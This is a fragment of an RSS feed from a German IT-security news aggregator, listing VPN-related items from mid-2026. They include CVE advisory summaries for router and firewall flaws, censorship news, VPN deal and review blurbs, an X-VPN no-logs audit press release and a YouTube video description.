<guid isPermaLink="true">https://tsecurity.de/de/3578869/IT+Sicherheit/Cybersecurity+Nachrichten/Cutting+Edge%2C+Part+4%3A+Ivanti+Connect+Secure+VPN+Post-Exploitation+Lateral+Movement+Case+Studies/</guid>
<pubDate>Thu, 04 Apr 2024 16:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Aktiv ausgenutzte Sicherheitslücken: Windows, Citrix und VPN sofort patchen - it boltwise]]></title> 
<description><![CDATA[Betroffen sind laut Meldung unterst&uuml;tzte Windows-Server-Versionen von 2012 bis 2025; Microsoft habe hierf&uuml;r bereits am 12. Mai 2026 ein Update&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3578063/IT+Server/Windows+Server/Aktiv+ausgenutzte+Sicherheitsl%C3%BCcken%3A+Windows%2C+Citrix+und+VPN+sofort+patchen+-+it+boltwise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578063/IT+Server/Windows+Server/Aktiv+ausgenutzte+Sicherheitsl%C3%BCcken%3A+Windows%2C+Citrix+und+VPN+sofort+patchen+-+it+boltwise/</guid>
<pubDate>Sat, 06 Jun 2026 10:59:47 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-11406 | GL.iNet MT3000 up to 4.4.5 OpenVPN Client Import Workflow ovpnclient.sh command injection (EUVD-2026-34963)]]></title> 
<description><![CDATA[A vulnerability identified as critical has been detected in GL.iNet MT3000 up to 4.4.5. This vulnerability affects unknown code of the file ovpnclient.sh of the component OpenVPN Client Import Workflow. This manipulation causes command injection.

This vulnerability is registered as CVE-2026-11406. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

You should upgrade the affected component.

The vendor confirms: &quot;This issue has been addressed by implementing malicious checks on OpenVPN configuration files to prevent command injection attacks carried through malicious configuration files.&quot; ]]></description>
<link>https://tsecurity.de/de/3577895/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-11406+%7C+GL.iNet+MT3000+up+to+4.4.5+OpenVPN+Client+Import+Workflow+ovpnclient.sh+command+injection+%28EUVD-2026-34963%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577895/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-11406+%7C+GL.iNet+MT3000+up+to+4.4.5+OpenVPN+Client+Import+Workflow+ovpnclient.sh+command+injection+%28EUVD-2026-34963%29/</guid>
<pubDate>Sat, 06 Jun 2026 16:49:12 +0200</pubDate>
</item>
<item> 
<title><![CDATA[‘It’s becoming more difficult finding stable VPNs’ – China increases crackdown on VPN usage]]></title> 
<description><![CDATA[People in China have used VPNs to get past the country&rsquo;s infamous Great Firewall &ndash; but Beijing is coming down hard on VPN use ]]></description>
<link>https://tsecurity.de/de/3577552/IT+Nachrichten/%E2%80%98It%E2%80%99s+becoming+more+difficult+finding+stable+VPNs%E2%80%99+%E2%80%93+China+increases+crackdown+on+VPN+usage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577552/IT+Nachrichten/%E2%80%98It%E2%80%99s+becoming+more+difficult+finding+stable+VPNs%E2%80%99+%E2%80%93+China+increases+crackdown+on+VPN+usage/</guid>
<pubDate>Sat, 06 Jun 2026 13:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[How to Access Blocked Sites in Pakistan Using a VPN]]></title> 
<description><![CDATA[Pakistani Internet users are no strangers to website blocks, but it is possible to bypass government censorship using the encrypting power of a VPN. While the subject is deeply technical, getting started is surprisingly user-friendly, and we&rsquo;ll be walking you through it all in today&rsquo;s quick-start guide. You&rsquo;ll learn about the best VPNs for Pakistan, [&hellip;]
The post How to Access Blocked Sites in Pakistan Using a VPN appeared first on AddictiveTips. ]]></description>
<link>https://tsecurity.de/de/3576855/IT+Betriebssysteme/How+to+Access+Blocked+Sites+in+Pakistan+Using+a+VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576855/IT+Betriebssysteme/How+to+Access+Blocked+Sites+in+Pakistan+Using+a+VPN/</guid>
<pubDate>Thu, 04 Jun 2026 16:35:40 +0200</pubDate>
</item>
<item> 
<title><![CDATA[How to Access Blocked Sites in India Using a VPN]]></title> 
<description><![CDATA[India has relatively open Internet policies, but there are still quite a few sites that are blocked to anyone connecting from within the country&rsquo;s digital borders. However, by encrypting your connection with a VPN, you can sneak past the censors and beat the geoblocks that stop you from accessing your favorite content in India. We [&hellip;]
The post How to Access Blocked Sites in India Using a VPN appeared first on AddictiveTips. ]]></description>
<link>https://tsecurity.de/de/3576854/IT+Betriebssysteme/How+to+Access+Blocked+Sites+in+India+Using+a+VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576854/IT+Betriebssysteme/How+to+Access+Blocked+Sites+in+India+Using+a+VPN/</guid>
<pubDate>Thu, 04 Jun 2026 16:53:11 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Trust Needs Verification: X-VPN Completed Independent No-Logs Audit]]></title> 
<description><![CDATA[
		
					  
						




Independent audit helps reinforce that X-VPN&rsquo;s privacy commitments are supported by operational controls, governance, and data-handling practices.



X-VPN&rsquo;s independent no-logs audit was completed on February 28, 2026, and was conducted by one of the Big Four auditing firms under ISAE 3000 (Revised). Based on the procedures performed within the defined audit scope and applicable review timeframe, the audit result supports that X-VPN does not track, collect, or store data that could identify users or link them to their online activities when using X-VPN.&nbsp;



In a category where trust depends on more than policy language alone, that result adds independent assurance that X-VPN&rsquo;s privacy commitments are supported by how the service is operated in practice.



Verification Matters in Privacy Services



For privacy services, the real question is not whether a provider makes reassuring claims, but whether those claims can withstand independent scrutiny. That is why independent verification matters. It helps shift the discussion from broad privacy language to examined evidence. In other words, verification gives users a stronger basis for assessing whether a no-logs position is supported in the way a service is actually run.



For X-VPN, that distinction is central to the significance of the completed audit. Rather than treating privacy as a matter of policy language alone, the review adds external scrutiny of the operational and governance measures behind the company&rsquo;s no-logs commitments. Where user trust is tied to the absence of identifiable activity records, that kind of independent assurance carries particular weight.



What Have Been Reviewed Under ISAE 3000 (Revised)



The engagement focused on X-VPN&rsquo;s Privacy Policy statements related to user data handling and the corresponding practices behind them. Within that boundary, the review looked at how those privacy commitments are reflected across X-VPN&rsquo;s official channels and in the way the service is managed in practice.



The scope was organized around five areas:&nbsp;




X-VPN does not store or record sensitive user information;&nbsp;



It limits processing to the minimum user information needed to provide the service;&nbsp;



Production servers are managed through a predefined automation system, all code changes are managed through a version-controlled CI/CD pipeline, and Database access is protected using encrypted transmission;&nbsp;



The Privacy Policy is maintained to accurately reflect system operations and data processing practices, and the review, update, and publication processes are traceable and verifiable;&nbsp;



The Data Protection Officer (&ldquo;DPO&rdquo;) Group operates with independence and traceability, providing ongoing oversight over privacy governance aligned with the no-logs principles.




Framed this way, the engagement was not limited to the no-logs statement itself. It also covered the supporting processes behind that statement, from server deployment and no-logs configuration consistency to pre-release code review and database access protection.



How X-VPN&rsquo;s No-Logs Position Is Supported in Practice



At the core of X-VPN&rsquo;s no-logs position is the absence of records that could identify users or connect them to online activities. Based on the completed audit, X-VPN does not track, collect, or store user IP addresses, destination IP addresses, websites visited, browsing history, VPN servers used, DNS queries, downloaded content, sensitive payment details, or VPN connection timestamps. That matters because a no-logs policy becomes more meaningful when it is reflected in the categories of data a service is designed not to retain. X-VPN also offers a free version, which follows the same no-logs policy and does not collect or store the categories of activity data listed above.



The audit scope also examined how X-VPN limits data processing to what is necessary to provide the service. User information is kept to a minimal set: an email address, an encrypted password, basic billing information limited to an order ID, and order history. No additional personal information is required to create or use an account, and users may register with an alias or disposable email address. At the same time, system monitoring is limited to non-identifying performance metrics, such as CPU usage, memory consumption, and service availability. Together, those practices help show that X-VPN&rsquo;s no-logs position is supported not only by policy language, but by how data collection is constrained in day-to-day operations.



How Users Can Access the Audit Report



Users who want to review the audit result can access the report after logging in to their X-VPN account. Providing that path matters because privacy assurance carries more weight when independent verification is not limited to a headline conclusion, but can also be accessed directly by users themselves.



Beyond the Audit: A Longer-Term Commitment to Privacy and Security



For X-VPN, the completed audit is not intended to stand as a one-time announcement, but as the starting point for a broader program of transparency, recurring review, and continuous improvement. The company plans to treat privacy and security as areas that require ongoing scrutiny rather than periodic messaging, with regular audits and continued updates designed to give users clearer and more verifiable visibility into how its commitments evolve over time.



That longer-term approach also means turning common areas of external concern, whether security gaps, trust blind spots, or unanswered questions about privacy practices&mdash;into part of an ongoing governance agenda. Rather than responding only at isolated moments, X-VPN aims to address those issues through trackable actions and continued public updates, including regular updates to its Transparency Report on the official website.



The broader effort is also reflected in product development and external support for the privacy community. X-VPN has already introduced newer privacy and security features such as post-quantum encryption and Tor over VPN, while also supporting nonprofit organizations focused on internet security and privacy, including EFF and ISOC, through donations and an expressed commitment to continued involvement. Taken together, these efforts position the audit not as an endpoint, but as one part of a longer-term effort to make privacy assurance more transparent, more accountable, and easier to verify.



About X-VPN



X-VPN is a global privacy and security service operated by LIGHTNINGLINK NETWORKS PTE. LTD., based in Singapore. With over 10,000 servers across 80 countries, X-VPN provides encrypted internet access using AES‑256 encryption, supporting users in protecting data, and maintaining anonymity online. The company enforces a strict no-logs policy, ensuring that no identifiable data is ever stored or shared.



Contact



Sandra Mitchell&nbsp;



sandramitchell@media.xvpn.io
 ]]></description>
<link>https://tsecurity.de/de/3576164/IT+Nachrichten/Trust+Needs+Verification%3A+X-VPN+Completed+Independent+No-Logs+Audit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576164/IT+Nachrichten/Trust+Needs+Verification%3A+X-VPN+Completed+Independent+No-Logs+Audit/</guid>
<pubDate>Fri, 05 Jun 2026 19:06:33 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Russian Roskomnadzor accused of launching active DDoS attacks on VPN services — here's what we know so far]]></title> 
<description><![CDATA[Russia&#039;s media regulator, Roskomnadzor, has allegedly shifted from blocking VPNs to actively launching DDoS attacks against their infrastructure, leaving services like Amnezia VPN struggling to stay online. ]]></description>
<link>https://tsecurity.de/de/3576068/IT+Nachrichten/Russian+Roskomnadzor+accused+of+launching+active+DDoS+attacks+on+VPN+services+%E2%80%94+here%27s+what+we+know+so+far/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576068/IT+Nachrichten/Russian+Roskomnadzor+accused+of+launching+active+DDoS+attacks+on+VPN+services+%E2%80%94+here%27s+what+we+know+so+far/</guid>
<pubDate>Fri, 05 Jun 2026 18:38:20 +0200</pubDate>
</item>
<item> 
<title><![CDATA[This $1.33 per month VPN is the most customizable option out there — perfect if you're after a secure connection tailored to your exact needs]]></title> 
<description><![CDATA[Boost your digital privacy your own way ]]></description>
<link>https://tsecurity.de/de/3575879/IT+Nachrichten/This+%241.33+per+month+VPN+is+the+most+customizable+option+out+there+%E2%80%94+perfect+if+you%27re+after+a+secure+connection+tailored+to+your+exact+needs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575879/IT+Nachrichten/This+%241.33+per+month+VPN+is+the+most+customizable+option+out+there+%E2%80%94+perfect+if+you%27re+after+a+secure+connection+tailored+to+your+exact+needs/</guid>
<pubDate>Fri, 05 Jun 2026 17:36:14 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Canada’s Bill C-22: Why Signal, Apple, and top VPNs are fighting the 'surveillance' law]]></title> 
<description><![CDATA[Big tech and VPN companies are demanding better protections for encryption as the government agrees to clarify contentious points. ]]></description>
<link>https://tsecurity.de/de/3575745/IT+Nachrichten/Canada%E2%80%99s+Bill+C-22%3A+Why+Signal%2C+Apple%2C+and+top+VPNs+are+fighting+the+%27surveillance%27+law/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575745/IT+Nachrichten/Canada%E2%80%99s+Bill+C-22%3A+Why+Signal%2C+Apple%2C+and+top+VPNs+are+fighting+the+%27surveillance%27+law/</guid>
<pubDate>Fri, 05 Jun 2026 16:00:18 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Stay safe & browse the internet freely with 70% off Proton VPN]]></title> 
<description><![CDATA[Virtual Private Networks, or VPNs, are basically a required utility in 2026 if you want to browse the internet without being tracked. Get Proton VPN at up to 70% off a two-year subscription.Proton VPN can keep your browsing habits private. Image source: ProtonIt seems like everyone on the internet is trying to track you. Whether it&#039;s data brokers trying to profit off your personal information or your ISP attempting to help build an advertising profile, all eyes are on you when you browse.There is a better option than giving up and living in a cave, and it&#039;s called Proton VPN. It lets you connect a VPN to up to ten devices at once for smooth and encrypted access to your apps and websites. Continue Reading on AppleInsider ]]></description>
<link>https://tsecurity.de/de/3575604/IT+Betriebssysteme/iOS+%2F+MacOS+Tipps/Stay+safe+%26amp%3B+browse+the+internet+freely+with+70%25+off+Proton+VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575604/IT+Betriebssysteme/iOS+%2F+MacOS+Tipps/Stay+safe+%26amp%3B+browse+the+internet+freely+with+70%25+off+Proton+VPN/</guid>
<pubDate>Fri, 05 Jun 2026 15:57:52 +0200</pubDate>
</item>
<item> 
<title><![CDATA[What is the Best VPN for Streaming]]></title> 
<description><![CDATA[&ldquo;`html The best VPN for streaming in 2026 is NordVPN. In our hands-on testing across Netflix, Hulu, Prime Video, and Fire TV, it consistently unblocked content on the first attempt, held speeds above 400 Mbps on a 500 Mbps connection, and worked reliably across every device we tested. If you want one answer you can [&hellip;]
The post What is the Best VPN for Streaming appeared first on AddictiveTips. ]]></description>
<link>https://tsecurity.de/de/3575403/IT+Betriebssysteme/What+is+the+Best+VPN+for+Streaming/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575403/IT+Betriebssysteme/What+is+the+Best+VPN+for+Streaming/</guid>
<pubDate>Wed, 03 Jun 2026 15:37:23 +0200</pubDate>
</item>
<item> 
<title><![CDATA[How to Unblock Facebook with a VPN 2026]]></title> 
<description><![CDATA[The best VPN for Facebook overall is NordVPN &mdash; it reliably unblocks Facebook in high-censorship countries, runs obfuscated servers that hide VPN traffic, and holds an independently audited no-logs policy. If you&rsquo;re watching your budget, Surfshark is the strongest value pick. For the fastest speeds on Messenger video calls, ExpressVPN leads the field. When people [&hellip;]
The post How to Unblock Facebook with a VPN 2026 appeared first on AddictiveTips. ]]></description>
<link>https://tsecurity.de/de/3575401/IT+Betriebssysteme/How+to+Unblock+Facebook+with+a+VPN+2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575401/IT+Betriebssysteme/How+to+Unblock+Facebook+with+a+VPN+2026/</guid>
<pubDate>Thu, 04 Jun 2026 09:13:09 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Best VPN to Unblock Popcornflix from Anywhere]]></title> 
<description><![CDATA[Popcornflix is a free, ad-supported streaming service &mdash; no subscription, no sign-up required. The catch is that it is only officially available in the United States, Canada, and a small number of other countries. If you try to access it from outside those regions, you hit a geo-block. Finding the best VPN for Popcornflix is [&hellip;]
The post Best VPN to Unblock Popcornflix from Anywhere appeared first on AddictiveTips. ]]></description>
<link>https://tsecurity.de/de/3575400/IT+Betriebssysteme/Best+VPN+to+Unblock+Popcornflix+from+Anywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575400/IT+Betriebssysteme/Best+VPN+to+Unblock+Popcornflix+from+Anywhere/</guid>
<pubDate>Thu, 04 Jun 2026 10:42:43 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-22226 | TP-Link Archer BE230 1.2.4 VPN Server Configuration os command injection (EUVD-2026-5089)]]></title> 
<description><![CDATA[A vulnerability classified as critical was found in TP-Link Archer BE230 1.2.4. The affected element is an unknown function of the component VPN Server Configuration Module. Executing a manipulation can lead to os command injection.

This vulnerability is handled as CVE-2026-22226. The attack can only be done within the local network. There is not any exploit available.

Upgrading the affected component is advised. ]]></description>
<link>https://tsecurity.de/de/3573891/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-22226+%7C+TP-Link+Archer+BE230+1.2.4+VPN+Server+Configuration+os+command+injection+%28EUVD-2026-5089%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573891/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-22226+%7C+TP-Link+Archer+BE230+1.2.4+VPN+Server+Configuration+os+command+injection+%28EUVD-2026-5089%29/</guid>
<pubDate>Thu, 04 Jun 2026 22:52:57 +0200</pubDate>
</item>
<item> 
<title><![CDATA[VPN und drei Sätze genügen: Das Instagram-Hack-Desaster von Meta]]></title> 
<description><![CDATA[Metas KI-Chatbot sollte Instagram-Nutzern helfen &ndash; stattdessen lieferte er monatelang Accounts an Hacker aus. Mit VPN und simplen Befehlen lie&szlig;en&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3573087/IT+Sicherheit/Hacker/VPN+und+drei+S%C3%A4tze+gen%C3%BCgen%3A+Das+Instagram-Hack-Desaster+von+Meta/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573087/IT+Sicherheit/Hacker/VPN+und+drei+S%C3%A4tze+gen%C3%BCgen%3A+Das+Instagram-Hack-Desaster+von+Meta/</guid>
<pubDate>Wed, 03 Jun 2026 13:05:02 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Roku just got 4 free sports channels including two from FIFA — but World Cup fans should still use these VPNs and apps instead]]></title> 
<description><![CDATA[Roku has added four new sports channels for free, just in time for the FIFA World Cup. ]]></description>
<link>https://tsecurity.de/de/3572448/IT+Nachrichten/Roku+just+got+4+free+sports+channels+including+two+from+FIFA+%E2%80%94+but+World+Cup+fans+should+still+use+these+VPNs+and+apps+instead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572448/IT+Nachrichten/Roku+just+got+4+free+sports+channels+including+two+from+FIFA+%E2%80%94+but+World+Cup+fans+should+still+use+these+VPNs+and+apps+instead/</guid>
<pubDate>Thu, 04 Jun 2026 13:56:48 +0200</pubDate>
</item>
<item> 
<title><![CDATA[This is the VPN I'd give to my gran to keep her banking safe and her online Scrabble secure — everything's explained, everything's private, and it's cheaper than NordVPN right now]]></title> 
<description><![CDATA[I&#039;ve tested VPNs for years, and this is the one that&#039;s simple enough to give to anyone. Right now it&#039;s even cheaper than the best VPN there is. ]]></description>
<link>https://tsecurity.de/de/3570383/IT+Nachrichten/This+is+the+VPN+I%27d+give+to+my+gran+to+keep+her+banking+safe+and+her+online+Scrabble+secure+%E2%80%94+everything%27s+explained%2C+everything%27s+private%2C+and+it%27s+cheaper+than+NordVPN+right+now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570383/IT+Nachrichten/This+is+the+VPN+I%27d+give+to+my+gran+to+keep+her+banking+safe+and+her+online+Scrabble+secure+%E2%80%94+everything%27s+explained%2C+everything%27s+private%2C+and+it%27s+cheaper+than+NordVPN+right+now/</guid>
<pubDate>Wed, 03 Jun 2026 19:04:46 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Why Millions of People Are Finally Looking Up What a VPN Is (And What to Do Next)]]></title> 
<description><![CDATA[In this post, I will talk about why millions of people are finally looking up what a VPN is (and what to do next). You&rsquo;re sitting in a coffee shop, laptop open, getting on with your day. You connect to the caf&eacute;&rsquo;s free Wi-Fi &mdash; the password is written on the chalkboard &mdash; and log [&hellip;]
The post Why Millions of People Are Finally Looking Up What a VPN Is (And What to Do Next) appeared first on SecureBlitz Cybersecurity. ]]></description>
<link>https://tsecurity.de/de/3569933/IT+Sicherheit/Cybersecurity+Nachrichten/Why+Millions+of+People+Are+Finally+Looking+Up+What+a+VPN+Is+%28And+What+to+Do+Next%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569933/IT+Sicherheit/Cybersecurity+Nachrichten/Why+Millions+of+People+Are+Finally+Looking+Up+What+a+VPN+Is+%28And+What+to+Do+Next%29/</guid>
<pubDate>Wed, 03 Jun 2026 16:17:57 +0200</pubDate>
</item>
<item> 
<title><![CDATA[VPN und drei Sätze genügen: Das Instagram-Hack-Desaster von Meta - Kreisbote]]></title> 
<description><![CDATA[Metas KI-Chatbot half Hackern monatelang, Instagram-Accounts zu &uuml;bernehmen. VPN und simple Befehle reichten aus. Jetzt reagiert der Konzern. ]]></description>
<link>https://tsecurity.de/de/3569316/IT+Sicherheit/Hacker/VPN+und+drei+S%C3%A4tze+gen%C3%BCgen%3A+Das+Instagram-Hack-Desaster+von+Meta+-+Kreisbote/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569316/IT+Sicherheit/Hacker/VPN+und+drei+S%C3%A4tze+gen%C3%BCgen%3A+Das+Instagram-Hack-Desaster+von+Meta+-+Kreisbote/</guid>
<pubDate>Wed, 03 Jun 2026 13:10:31 +0200</pubDate>
</item>
<item> 
<title><![CDATA[heise+ | WireGuard 1.0: Stabiles Firmen-VPN im Test]]></title> 
<description><![CDATA[Der Windows-Client des VPN WireGuard hat Version 1.0 erreicht. Es eignet sich somit f&uuml;r den Unternehmenseinsatz, Admins sollten aber die Einschr&auml;nkungen kennen. ]]></description>
<link>https://tsecurity.de/de/3569107/IT+Nachrichten/heise%2B+%7C+WireGuard+1.0%3A+Stabiles+Firmen-VPN+im+Test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569107/IT+Nachrichten/heise%2B+%7C+WireGuard+1.0%3A+Stabiles+Firmen-VPN+im+Test/</guid>
<pubDate>Wed, 03 Jun 2026 12:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-20069 | Cisco Secure Firewall Adaptive Security Appliance Software VPN Web Service request smuggling (cisco-sa-asaftd-desync-n5AVzEQw)]]></title> 
<description><![CDATA[A vulnerability marked as problematic has been reported in Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software. This affects an unknown function of the component VPN Web Service. Performing a manipulation results in http request smuggling.

This vulnerability is reported as CVE-2026-20069. The attack is possible to be carried out remotely. No exploit exists.

It is suggested to upgrade the affected component. ]]></description>
<link>https://tsecurity.de/de/3568417/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-20069+%7C+Cisco+Secure+Firewall+Adaptive+Security+Appliance+Software+VPN+Web+Service+request+smuggling+%28cisco-sa-asaftd-desync-n5AVzEQw%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568417/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-20069+%7C+Cisco+Secure+Firewall+Adaptive+Security+Appliance+Software+VPN+Web+Service+request+smuggling+%28cisco-sa-asaftd-desync-n5AVzEQw%29/</guid>
<pubDate>Wed, 03 Jun 2026 07:40:46 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Decentralized NymVPN rolls out post-quantum protections as standard alongside a massive redesign]]></title> 
<description><![CDATA[NymVPN&#039;s new v2026.9 update focuses on usability and security, introducing a simplified UI, default post-quantum keys on Fast Mode, and an iOS beta ad blocker. ]]></description>
<link>https://tsecurity.de/de/3566695/IT+Nachrichten/Decentralized+NymVPN+rolls+out+post-quantum+protections+as+standard+alongside+a+massive+redesign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566695/IT+Nachrichten/Decentralized+NymVPN+rolls+out+post-quantum+protections+as+standard+alongside+a+massive+redesign/</guid>
<pubDate>Tue, 02 Jun 2026 17:22:15 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Shopping Prime Day on 26 June? Grab this affordable VPN to protect your data—and score a free Amazon gift card while you're at it.]]></title> 
<description><![CDATA[There&#039;s less than 24 hours left to secure your data and grab a freebie ]]></description>
<link>https://tsecurity.de/de/3566691/IT+Nachrichten/Shopping+Prime+Day+on+26+June%3F+Grab+this+affordable+VPN+to+protect+your+data%E2%80%94and+score+a+free+Amazon+gift+card+while+you%27re+at+it./</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566691/IT+Nachrichten/Shopping+Prime+Day+on+26+June%3F+Grab+this+affordable+VPN+to+protect+your+data%E2%80%94and+score+a+free+Amazon+gift+card+while+you%27re+at+it./</guid>
<pubDate>Tue, 02 Jun 2026 17:30:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Rapid7 observes new Palo Alto VPN flaw exploited in the wild to bypass GlobalProtect authentication]]></title> 
<description><![CDATA[A flaw fixed last month is now being used in real-life attacks, and security researchers are urging users to patch. ]]></description>
<link>https://tsecurity.de/de/3566641/IT+Nachrichten/Rapid7+observes+new+Palo+Alto+VPN+flaw+exploited+in+the+wild+to+bypass+GlobalProtect+authentication/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566641/IT+Nachrichten/Rapid7+observes+new+Palo+Alto+VPN+flaw+exploited+in+the+wild+to+bypass+GlobalProtect+authentication/</guid>
<pubDate>Tue, 02 Jun 2026 17:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[VPN im Browser nutzen: So surft ihr sicher und kostenlos in Chrome, Firefox und Co.]]></title> 
<description><![CDATA[Ein VPN k&ouml;nnt ihr auch kostenlos im Browser nutzen, ohne gleich zu kostenpflichtigen VPN-Diensten zu greifen. F&uuml;r Chrome, Firefox und Co. gibt es verschiedene L&ouml;sungen.
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	VPN,																	Sicherheit,																	Browser. ]]></description>
<link>https://tsecurity.de/de/3566317/IT+Nachrichten/VPN+im+Browser+nutzen%3A+So+surft+ihr+sicher+und+kostenlos+in+Chrome%2C+Firefox+und+Co./</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566317/IT+Nachrichten/VPN+im+Browser+nutzen%3A+So+surft+ihr+sicher+und+kostenlos+in+Chrome%2C+Firefox+und+Co./</guid>
<pubDate>Tue, 02 Jun 2026 14:21:46 +0200</pubDate>
</item>
<item> 
<title><![CDATA[The Truth About VPNs, Free VPNs, and Online Privacy \\ Day 19 - 2026 30 Day Security Challenge]]></title> 
<description><![CDATA[Author: Shannon Morse - Bewertung: 36x - Views:182 Huge thanks to DeleteMe for sponsoring today&rsquo;s episode 💜
Use code SNUBS for 20% off your plan! https://joindeleteme.com/morsecode

🔒 Day 19 of my 30-Day Security Challenge is all about VPNs, online privacy, public Wi-Fi safety, and why protecting your internet traffic is only ONE layer of digital security. 

Today we&rsquo;re breaking down:
- What a VPN actually does
- Why VPNs are useful on public Wi-Fi
- ISP tracking and data privacy
- Why free VPNs can be risky
- How I use VPNs for travel, anime merch shopping, and streaming
- What to look for when choosing a VPN
- Why DeleteMe helps protect your personal information online

🌐 Follow the Challenge: 
https://snubsie.com/30-day-security-challenge

▶️ Watch the Full Playlist:
- Full Playlist - https://www.youtube.com/watch?v=l_lKuDhUjLE&amp;list=PLeYHKbaShxTEyhny7eoWDZ92w-4bLS1Tp&amp;index=1&amp;t=1s

#VPN #Privacy #CyberSecurity #DeleteMe #OnlinePrivacy #VPNExplained #Wireguard #OpenVPN #DataPrivacy #InternetSecurity #PublicWiFi #PrivacyTips

Chapters
 - Day 19 Begins
00:43 - What is a VPN?
01:30 - Why VPNs Matter
02:00 - Public Wi-Fi Risks
02:48 - Bypassing Internet Restrictions
03:45 - ISP Snooping Explained
04:30 - Region-Locked Content and Anime Merch
05:28 - VPNs vs Data Brokers
06:20 - Why I Personally Use DeleteMe
08:05 - Privacy Requires Layers
09:08 - VPNs Aren&rsquo;t Just for Criminals
10:00 - The Problem with Free VPNs
11:38 - Choosing the Right VPN
13:45 - My Favorite VPN Features
14:48 - Downsides of VPNs
15:40 - Day 20 Preview

LINKS:
https://docs.google.com/spreadsheets/d/1ijfqfLrJWLUVBfJZ_YalVpstWsjw-JGzkvMd6u2jqEk/edit?usp=sharing 
https://www.reddit.com/r/vpnreviews/comments/1f34sgc/best_vpn_list_detailed_vpn_comparison/ 
https://www.buzzfeednews.com/article/craigsilverman/vpn-and-ad-blocking-apps-sensor-tower

Becoming a Morse Code Member by checking out the perks linked here!:
https://www.youtube.com/channel/UCNofX8wmSJh7NTklvMqueOA/join

Editor: @ColleenEdits

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

SUBSCRIBE! 🌸 http://www.youtube.com/ShannonMorse?sub_confirmation=1

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

SUPPORT MY WORK
PATREON 💛 https://www.patreon.com/ShannonMorse
BUY ME A COFFEE 💛 https://www.buymeacoffee.com/snubs
MY SHOP 💛 https://shannonrmorse.com/shop
SPRING SHOP 💛 https://morsecode.creator-spring.com/
ACTIVE COUPON CODES 💛 https://shannonrmorse.com/support

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

FOLLOW THE SOCIALS THINGS
THREADS 🌸  https://www.threads.net/@snubs
INSTAGRAM 🌸  http://www.instagram.com/snubs
TIKTOK 🌸  https://tiktok.com/@snubsie
YOUTUBE 🌸 http://www.youtube.com/ShannonMorse?sub_confirmation=1
WEBSITE 🌸 https://www.morsecodecreative.com/

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

TECH I USE AND RECOMMEND
My Kits, Builds, and Must Haves ✨ https://kit.co/ShannonMorse
My Amazon Influencer Page ✨ https://www.amazon.com/shop/shannonmorse
My LiveStreaming Software ✨ https://streamyard.com/pal/d/6029725427957760

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

MY OTHER SHOWS
Shannon Travels The World 🌙 https://www.youtube.com/@ShannonTravelsTheWorld/featured 
Sailor Snubs 🌙 https://www.youtube.com/@SailorSnubs/featured 

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

GET IN TOUCH
Mail ✈ 
https://shannonrmorse.com/contact 

Email for Business and Sponsorship Inquiries ✈ Shannon@ShannonRMorse.com
My Media Kit ✈ https://shannonrmorse.com/work-with-me 
Sponsor This Channel ✈ https://shannonrmorse.com/shannon-morse 

💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜

😍 FTC DISCLAIMER 😍
Affiliate links listed above allow me to receive a small commission. Any sponsorships for videos are noted in video and listed in descriptions. Any products provided as gifts are listed above. Thank you for your support!

Comment section code of conduct policy:
